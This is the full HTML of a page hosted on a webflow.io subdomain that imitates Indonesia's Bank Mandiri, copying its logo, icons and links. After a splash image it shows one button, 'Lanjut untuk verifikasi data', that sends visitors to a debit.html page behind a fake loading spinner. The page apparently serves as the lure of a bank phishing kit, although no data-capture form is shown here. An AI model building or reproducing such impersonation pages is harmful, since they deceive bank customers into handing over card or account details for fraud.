<html data-wf-domain="bank-mandiri.webflow.io" data-wf-page="63df50dca45a73798332a501" data-wf-site="63df50dca45a7315ce32a500" class=" w-mod-js w-mod-touch">
 <head>
<meta name="theme-color" content="#1E90FF"> 
  <style>.wf-force-outline-none[tabindex="-1"]:focus{outline:none;}</style>
  <meta charset="utf-8">
  <title>Bank Mandiri</title>
  <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport">
  <meta content="Webflow" name="generator">
  <link href="https://uploads-ssl.webflow.com/63df50dca45a7315ce32a500/css/bank-mandiri.webflow.deab0ac8f.css" rel="stylesheet" type="text/css">
  <!--[if lt IE 9]> <![endif]--> 
  <link href="https://play-lh.googleusercontent.com/sykVTkZ6juW7CD1eeZCK1UTi1aDwr4tOQ6KRMuMimOsIZYsK9Rbxwhk-PGu3nA1iaoQ1=w480-h960-rw" rel="shortcut icon" type="image/x-icon">
  <link href="https://play-lh.googleusercontent.com/sykVTkZ6juW7CD1eeZCK1UTi1aDwr4tOQ6KRMuMimOsIZYsK9Rbxwhk-PGu3nA1iaoQ1=w480-h960-rw" rel="apple-touch-icon"> 
 </head>
 <style>
 
 @import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:400,500,600,700|Source+Sans+Pro:400,600,700&display=swap");

 
 
 
  @media screen and (max-width: 480px) {
                body{
                position: fixed;
                width: 100%;
                left: 0;
                top: 0; 
                bottom: 0;
                right: 0;
                margin: 0px auto;
                height: 100%;
                text-align: center;
 }
  }
  
  
   @media screen and (max-width: 360px) {
                body{
                position: fixed;
                width: 100%;
                left: 0;
                top: 0; 
                bottom: 0;
                right: 0;
                margin: 0px auto;
                height: 100%;
                text-align: center;
 }
  }
  
  
 @media screen and (max-width: 360px) {
     .container{
                 position: fixed;
                width: 100%;
                left: 0;
                top: 0; 
                bottom: 0;
                right: 0;
                margin: 0px auto;
                height: 100%;
                text-align: center;
}
}



 @media screen and (max-width: 480px) {
     .container{
                 position: fixed;
                width: 100%;
                left: 0;
                top: 0; 
                bottom: 0;
                right: 0;
                margin: 0px auto;
                height: 100%;
                text-align: center;
}
}



welalxcome {
    display: flex;
  position: fixed;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%;
  background:rgba(255,255,255, 0.6) url(https://uploads-ssl.webflow.com/63df50dca45a7315ce32a500/63df50dca45a7364c832a528_IMG_20221224_132235.jpg) no-repeat center center;
  background-position: 100% 100%;
  background-size: 100% 100%;
  z-index: 10000;

}
welalxcome img {
        width:100%;
    height: 700px;
    margin-top: -55px;
    
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}


.loader {
    margin-top: 300;
    width: 35px;
    height: 35px;
    background: #fff;
    border: 5px solid #1E90FF;
    outline: 5px solid #fff;
    border-bottom-color: transparent;
    border-radius: 50%;
    display: inline-block;
    box-sizing: border-box;
    animation: rotation 1s linear infinite;
    }

    @keyframes rotation {
    0% {
        transform: rotate(0deg);
    }
    100% {
        transform: rotate(360deg);
    }
    } 
    
    
    #loadingku{
    position: fixed; 
    top: 0; 
    right: 0; 
    left: 0; 
    display: none;
    bottom: 0;
    margin: 0px auto;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.5);
    z-index: 99999999;
}

 </style>
 <body>
          <main>
<welalxcome>
</welalxcome>
<chsalxcome2 style="display: none;">
<div style="height:30px;width: 70px;margin-top: -30px;margin-bottom: 0px;float:center;margin-left:42%" class="talxcome">
</div>
  <div class="container w-container">
   <div data-animation="default" class="navbar w-nav" data-easing2="ease-out" data-easing="ease-in" data-collapse="tiny" role="banner" data-no-scroll="1" data-duration="400" data-doc-height="1">
    <div class="container-3 w-container">
     <a href="#" class="brand w-nav-brand"><img src="https://uploads-ssl.webflow.com/63df50dca45a7315ce32a500/63df50dca45a73ff3f32a51c_layout_set_logo.png" loading="lazy" width="90" alt="" class="image"></a>
     <nav role="navigation" class="nav-menu w-nav-menu">
      <a href="https://bankmandiri.co.id/en/perseorangan" class="nav-link w-nav-link">Individual</a>
      <a href="https://bankmandiri.co.id/web/guest/bisnis" class="nav-link-2 w-nav-link">Business</a>
      <a href="/" aria-current="page" class="nav-link-3 w-nav-link w--current">Home</a>
     </nav>
     <div class="menu-button brand w-nav-button" style="-webkit-user-select: text;" aria-label="menu" role="button" tabindex="0" aria-controls="w-nav-overlay-0" aria-haspopup="menu" aria-expanded="false">
      <div class="icon w-icon-nav-menu"></div>
     </div>
    </div>
    <div class="w-nav-overlay" data-wf-ignore="" id="w-nav-overlay-0"></div>
   </div>
  </div>
  <div class="container-2 w-container" >
<div style="margin-top: 6px">
    <a href="debit.html">
   <button type="button" class="button w-button" onclick="letsGo()" style="background: #037CFE; color: #fff; font-weight: bold; font-size: 17px;  font-family: "Source Sans Pro", sans-serif;">Lanjut untuk verifikasi data</button>
   </a>
   <a href="debit.html" style="width: 100%; height: 88px; background: #fff; bottom: 0; left: 0; right: 0; position: fixed; z-index: -;">
  
       </a>
  </div>
  </div>
 <center>
  <div class="app-loading" style="position: fixed; margin: 0px auto; left: 0; right: 0; top: 0; bottom: 0; width: 100%; height: 100%; background: rgba(190, 190, 190, 0.4); z-index: 99999999; padding-top: 250px; display: none" id="lodingku">
    <img class="img-fluid" style="width: 140px" src="https://join.bankmandiri.co.id/app/assets/img/img_mandiri/preloader1.gif" alt="preloader" />
      </div>
  </center>
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous">
    </script>
     <script>

        $(document).ready(function() {

            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },1850)
        });
        
        
        
        
   
           
</script>
<script>
  function letsGo(){
      $("#lodingku").show();
       setTimeout(function () {
      $("#lodingku").fadeOut();
      }, 4200);
        }
    </script>
  <!--[if lte IE 9]> <![endif]-->
 </body>
</html>